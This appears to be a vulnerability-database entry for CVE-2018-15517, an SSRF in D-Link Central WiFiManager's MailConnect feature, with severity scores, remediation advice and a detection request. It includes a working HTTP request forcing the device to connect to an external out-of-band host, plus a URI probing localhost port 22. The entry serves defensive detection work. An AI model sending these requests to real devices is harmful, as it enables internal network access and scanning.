| Title | D-Link Central WifiManager - Server-Side Request Forgery |
|---|---|
| Author | gy741 |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network. |
| Remediation | Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. |
| CVSS Score | 8.6 |
| EPSS Score | 0.76866 |
| CVE ID | CVE-2018-15517 |
| CWE ID | CWE-918 |
| Tags | cve cve2018 seclists packetstorm dlink ssrf oast vkev vuln |
D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
GET /index.php/System/MailConnect/host/d5jprv1le0o2cf0r82t09dddje8wnon3b.oast.online/port/80/secure/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-15517.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-15517.pcap
N/AN/A